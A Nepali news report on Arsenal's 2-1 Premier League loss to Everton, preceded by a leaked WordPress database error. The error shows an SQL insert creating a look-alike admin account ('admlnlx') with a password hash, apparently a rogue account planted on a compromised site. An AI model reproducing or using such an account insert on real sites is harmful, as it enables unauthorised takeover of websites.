WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhcMPM3ITomL5OqtVzeK0H/bfpKiHc/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-09 02:12:55', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २९–
आर्सनलले चेल्सीलाई पछि पार्दै इंग्लिस प्रिमियर लिगको शीर्ष स्थानमा उक्लिने मौका गुमाएको छ। गयराति भएको खेलमा एभर्टनसँग २–१ ले पराजित भएसँगै आर्सनलको शीर्ष स्थानमा फर्किने मौका गुमेको हो।
एभर्टनका लागि सेमस कोलमेन र विलियम्सले गोल गरेका थिए। आर्सनलले २० औं मिनेटमा एलेक्स सान्चेजको गोलबाट खेलमा अग्रता लिए पनि जोगाउन सकेन। यो हारपछि दोस्रो स्थानको आर्सनलको १६ खेलबाट ३४ अंक छ। एक खेल कम खेलेको शीर्ष स्थानको चेल्सीको ३७ अंक छ।